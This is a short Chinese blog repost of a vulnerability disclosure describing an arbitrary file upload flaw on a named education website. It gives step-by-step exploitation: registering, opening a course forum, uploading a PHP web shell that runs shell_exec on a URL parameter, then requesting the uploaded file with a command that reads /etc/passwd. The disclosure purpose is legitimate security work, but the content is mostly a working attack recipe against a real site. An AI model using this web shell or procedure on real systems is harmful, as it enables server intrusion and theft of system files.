当前位置:   article > 正文

【漏洞学习——任意文件上传】LAMP兄弟连旗下猿代码存在任意上传文件漏洞_lamp 漏洞

lamp 漏洞

漏洞细节

输入网址:http://www.ydma.cn/ 
1、随意注册一个账号
2、购买任意免费课程
3、进入该课程的讨论区
4、点击发表话题,点击上传图片。

  1. <?php
  2. $x = shell_exec($_GET['XX']);
  3. var_dump($x);
  4. ?>

复制返回地址到浏览器打开。
例如:http://www.ydma.cn/files/image/2015/11-18/765506617564c41053996b.php
or :http://www.ydma.cn/files/image/2015/11-18/1889937821564c46536c47e.php?XX=cat%20/etc/passwd
======================
我只是友情测试漏洞,并未深入

参见:https://bugs.shuimugan.com/bug/view?bug_no=154170

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/代码探险家/article/detail/755966
推荐阅读
相关标签
  

闽ICP备14008679号